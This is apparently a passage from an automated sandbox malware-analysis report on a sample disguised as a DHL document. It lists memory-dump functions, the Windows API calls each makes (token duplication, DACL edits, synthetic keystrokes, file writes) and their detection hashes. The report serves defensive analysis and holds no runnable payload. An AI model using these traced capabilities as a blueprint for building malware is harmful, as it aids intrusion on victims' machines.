Instruction ID: 09850db450a3f934e734deac76c3bcbb45d5c67a706a808dc5089a8816146422
Opcode Fuzzy Hash: 924c36d50dc71402c8d330c70576d08fdbc42a4b4ddc7af25e4f919b61478919
Instruction Fuzzy Hash: 71F0E23162622467DB215F66AC0AF5B3789BF617A1B19412BF819AA380CB70D80196E0

Function 001D3820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00271444,?,001BFDF5,?,?,001AA976,00000010,00271440,001A13FC,?,001A13C6,?,001A1129), ref: 001D3852

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 80e1de8623a64bdf1971b5bac521dac4db6477f1bc1fcb973503da5bb668582c
Instruction ID: 65e232ff6a6aa6ecac9cc938b21fd87edf42c8f29b09f29d42c1e7b7e6c14413
Opcode Fuzzy Hash: 80e1de8623a64bdf1971b5bac521dac4db6477f1bc1fcb973503da5bb668582c
Instruction Fuzzy Hash: 44E0E53110022457D62126669C05F9A374AAF527B0F1A022ABC24966D0CB50ED01B2E3

Function 001A4F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4F6D

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: d99dc98c641b30178141905d9dc5c53c3d905949d60f645e0c2a90c857672207
Instruction ID: 4cbb2b07764946db11e5b3c08f293681e07850fdc03d799543fd108765ca708f
Opcode Fuzzy Hash: d99dc98c641b30178141905d9dc5c53c3d905949d60f645e0c2a90c857672207
Instruction Fuzzy Hash: C5F0A075005351CFCB388F38D490812B7F0AF51319320997EE1DA82611C7B19844DF40

Function 0020CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,001EEE51,00263630,00000002), ref: 0020CD26

Part of subcall function 0020CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0020CD19,?,?,?), ref: 0020CC59
Part of subcall function 0020CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0020CD19,?,?,?,?,001EEE51,00263630,00000002), ref: 0020CC6E
Part of subcall function 0020CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0020CD19,?,?,?,?,001EEE51,00263630,00000002), ref: 0020CC7A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: f665d3b8b2a0673bd32d6900ec666674a5165357edba6a0653334bbaf31154e5
Instruction ID: 16f80d7e5773bf099de5e0dbacb463bb18dfc6ea4178e3b40dfd2ceba7de4413
Opcode Fuzzy Hash: f665d3b8b2a0673bd32d6900ec666674a5165357edba6a0653334bbaf31154e5
Instruction Fuzzy Hash: C3E065B6400704FFD7219F56DD4089ABBF8FF84750720852FE995D2111D3B1AA14DF60

Function 001A2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A2DC4

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 38078d8f2aeee84476adbc150acd082077c3770009101f71df0eed7562f2c28d
Instruction ID: 4833d4cf9faffa81ad9aca75093603b2e85aaa5b752b2f3836db7d14f7c2f5a4
Opcode Fuzzy Hash: 38078d8f2aeee84476adbc150acd082077c3770009101f71df0eed7562f2c28d
Instruction Fuzzy Hash: 34E0CD766001245BC71192589C05FDE77DDDFC8790F040071FD09E7248DA70AD848690

Function 001A2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 001A3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001A3908

Part of subcall function 001AD730: GetInputState.USER32 ref: 001AD807

SetCurrentDirectoryW.KERNEL32(?), ref: 001A2B6B

Part of subcall function 001A30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 001A314E

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 45cbd71cd768268b55ccdd11d34fecae09105f9e4eb9ebede4dd58509f2ffceb
Instruction ID: d2b72b6a6684cf0d2ab727a9c9db2934460354204041deb765c1c4879632a569
Opcode Fuzzy Hash: 45cbd71cd768268b55ccdd11d34fecae09105f9e4eb9ebede4dd58509f2ffceb
Instruction Fuzzy Hash: 0AE0262A30020407C608BB78B82667DB3498FF3351F40053EF05743162CF2445954311

Function 001E039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,001E0704,?,?,00000000,?,001E0704,00000000,0000000C), ref: 001E03B7

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6079ccc06b75d68aba04b9b4a144eaf42c3498d591c4d31f8fc5776ad9e70905
Instruction ID: f136de914de95d677c83f2dea2064a93602f73d92cc7b73d873672b0c28a06c7
Opcode Fuzzy Hash: 6079ccc06b75d68aba04b9b4a144eaf42c3498d591c4d31f8fc5776ad9e70905
Instruction Fuzzy Hash: 13D06C3204010DBBDF028F84ED0AEDA3BAAFB48714F114000BE5866020C732E821AB90

Function 001A1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001A1CBC

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: a593b6aa037e1f8e45053129bb3d9c36fb922878e1f133f289a604e1976a58b0
Instruction ID: d5c60ba40dd504318b5775d7c9232c310e85b045e6eaf8861b1f6b9fbd9b9626
Opcode Fuzzy Hash: a593b6aa037e1f8e45053129bb3d9c36fb922878e1f133f289a604e1976a58b0
Instruction Fuzzy Hash: F0C09236280304EFF2188B94BC4EF107764E748B00F948001F64DB95E3C3A228A0EB60

Function 0021744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 001A5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,001A949C,?,00008000), ref: 001A5773

GetLastError.KERNEL32(00000002,00000000), ref: 002176DE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: cfeeb2f654efb90e47839b2ce74957b68358c9597347bf320519524d9f7d4fb1
Instruction ID: d72b374d27db31659ea81c8aa263d22f58a4e375ee6e9b28f2bf0a823b2cd9b2
Opcode Fuzzy Hash: cfeeb2f654efb90e47839b2ce74957b68358c9597347bf320519524d9f7d4fb1
Instruction Fuzzy Hash: 2181D3346187019FCB14EF28C491BA9B7F5BFAA310F04452DF8865B292DB30ED95CB92

Function 001A6246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,001E24E0), ref: 001A6266

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5fbd1b8fa4911c0eed2ce4dc36e2918762180a5ceafa0b30d3e78aabf2d54e4b
Instruction ID: c8ec4d25922d85db010b9856a5713c2dd3cebf1bce8d6c7e40ebef370a419425
Opcode Fuzzy Hash: 5fbd1b8fa4911c0eed2ce4dc36e2918762180a5ceafa0b30d3e78aabf2d54e4b
Instruction Fuzzy Hash: 40E09279400B01CEC3315F2AE804552FBE5FEE27613254A2FD0E692660D3B458868B50

Function 013871F0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01387201

Memory Dump Source

Source File: 00000000.00000002.1464284078.0000000001384000.00000040.00000020.00020000.00000000.sdmp, Offset: 01384000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1384000_DHL 8350232025-1.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: f920f61cbfc1b3fcd8e4faaaa3893382e1bff48b8b8db4e8aca0865eac2e7585
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 86E0E67498020DDFDB00EFB4D94969E7FB4FF04301F100561FD01D2281D6309D508A72

Non-executed Functions

Function 00239576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 001B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001B9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0023961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0023965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0023969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002396C9
SendMessageW.USER32 ref: 002396F2
GetKeyState.USER32(00000011), ref: 0023978B
GetKeyState.USER32(00000009), ref: 00239798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002397AE
GetKeyState.USER32(00000010), ref: 002397B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002397E9
SendMessageW.USER32 ref: 00239810
SendMessageW.USER32(?,00001030,?,00237E95), ref: 00239918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0023992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00239941
SetCapture.USER32(?), ref: 0023994A
ClientToScreen.USER32(?,?), ref: 002399AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002399BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002399D6
ReleaseCapture.USER32 ref: 002399E1
GetCursorPos.USER32(?), ref: 00239A19
ScreenToClient.USER32(?,?), ref: 00239A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 00239A80
SendMessageW.USER32 ref: 00239AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 00239AEB
SendMessageW.USER32 ref: 00239B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00239B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00239B4A
GetCursorPos.USER32(?), ref: 00239B68
ScreenToClient.USER32(?,?), ref: 00239B75
GetParent.USER32(?), ref: 00239B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 00239BFA
SendMessageW.USER32 ref: 00239C2B
ClientToScreen.USER32(?,?), ref: 00239C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00239CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 00239CDE
SendMessageW.USER32 ref: 00239D01
ClientToScreen.USER32(?,?), ref: 00239D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00239D82

Part of subcall function 001B9944: GetWindowLongW.USER32(?,000000EB), ref: 001B9952

GetWindowLongW.USER32(?,000000F0), ref: 00239E05

Strings

@GUI_DRAGID, xrefs: 0023997D
F, xrefs: 00239D07
p#', xrefs: 00239990

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#'
API String ID: 3429851547-1308831974
Opcode ID: 018099659a3017462ca7f705aa1fb6b14960128d85a100e5a7a0de95c5c6efdb
Instruction ID: 1f9075e557558f0a0bb11dc10e38274c8a4ecba04f0397a91dbcf5494703ad4b
Opcode Fuzzy Hash: 018099659a3017462ca7f705aa1fb6b14960128d85a100e5a7a0de95c5c6efdb
Instruction Fuzzy Hash: 8042D1B4615201AFD724CF28DC49EAABBF9FF4A310F100619F699972A1D7B1D8A1CF41

Function 00234873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002348F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00234908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00234927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0023494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0023495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0023497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002349AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002349D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00234A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00234A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00234A7E
IsMenu.USER32(?), ref: 00234A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00234AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00234B20
GetWindowLongW.USER32(?,000000F0), ref: 00234B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00234BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00234C82
wsprintfW.USER32 ref: 00234CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00234CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 00234CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00234D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00234D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 00234D5A

Strings

%d/%02d/%02d, xrefs: 00234CA8

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: cd6a2b0d7037ca155a6f95d36f6d1eefdba7b5fde41f68c38f99e95489938792
Instruction ID: b24c49adbd4dd68df6a7c7596dc692fb6c0806941010c18dce4b5d1fa9afa2ad
Opcode Fuzzy Hash: cd6a2b0d7037ca155a6f95d36f6d1eefdba7b5fde41f68c38f99e95489938792
Instruction Fuzzy Hash: 1F1223B1620205ABEB24AF24DC49FAE7BF8EF85300F1441A9F515EB2E1DB74A951CF50

Function 001BF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001BF998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001FF474
IsIconic.USER32(00000000), ref: 001FF47D
ShowWindow.USER32(00000000,00000009), ref: 001FF48A
SetForegroundWindow.USER32(00000000), ref: 001FF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001FF4AA
GetCurrentThreadId.KERNEL32 ref: 001FF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001FF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 001FF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 001FF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 001FF4DE
SetForegroundWindow.USER32(00000000), ref: 001FF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 001FF4F6
keybd_event.USER32(00000012,00000000), ref: 001FF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 001FF50B
keybd_event.USER32(00000012,00000000), ref: 001FF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 001FF519
keybd_event.USER32(00000012,00000000), ref: 001FF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 001FF528
keybd_event.USER32(00000012,00000000), ref: 001FF52D
SetForegroundWindow.USER32(00000000), ref: 001FF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 001FF557

Strings

Shell_TrayWnd, xrefs: 001FF46F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: e0e87644c418b28d39c43cfc5f494887616c948bd7c360bdb702fd11cd6e62d9
Instruction ID: 903a1c8971733685c0402ede9cfe4a0ec1fa47e0f8c8230f3f92e7f78d8d9bdc
Opcode Fuzzy Hash: e0e87644c418b28d39c43cfc5f494887616c948bd7c360bdb702fd11cd6e62d9
Instruction Fuzzy Hash: 2F311071A40218BAEB216BB56C4AFBF7E6CEB44B50F210069FA05F61D1C7B19911AB60

Function 00201201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 002016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0020170D
Part of subcall function 002016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0020173A
Part of subcall function 002016C3: GetLastError.KERNEL32 ref: 0020174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00201286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002012A8
CloseHandle.KERNEL32(?), ref: 002012B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002012D1
GetProcessWindowStation.USER32 ref: 002012EA
SetProcessWindowStation.USER32(00000000), ref: 002012F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00201310

Part of subcall function 002010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002011FC), ref: 002010D4
Part of subcall function 002010BF: CloseHandle.KERNEL32(?,?,002011FC), ref: 002010E9

Strings

Z&, xrefs: 00201392
default, xrefs: 0020130B
winsta0, xrefs: 002012CC
, xrefs: 0020125A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$Z&
API String ID: 22674027-566727265
Opcode ID: 08b443e59c343a78c0f9bdde53e1f56938781302eaa24b99a11e761ae012377d
Instruction ID: 5afbb2af3650f63fec46d24eb8fbf788d289115834f33cab1463b87168b199bb
Opcode Fuzzy Hash: 08b443e59c343a78c0f9bdde53e1f56938781302eaa24b99a11e761ae012377d
Instruction Fuzzy Hash: 8F819A7191034AAFDF219FA4DC4AFEE7BB9EF08704F144129F910B61A2D7718A64CB20

Function 00200B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00201114
Part of subcall function 002010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 00201120
Part of subcall function 002010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 0020112F
Part of subcall function 002010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00200B9B,?,?,?), ref: 00201136
Part of subcall function 002010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00200BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00200C00
GetLengthSid.ADVAPI32(?), ref: 00200C17
GetAce.ADVAPI32(?,00000000,?), ref: 00200C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00200C6D
GetLengthSid.ADVAPI32(?), ref: 00200C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00200C8C
HeapAlloc.KERNEL32(00000000), ref: 00200C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00200CB4
CopySid.ADVAPI32(00000000), ref: 00200CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00200CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00200D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00200D1E
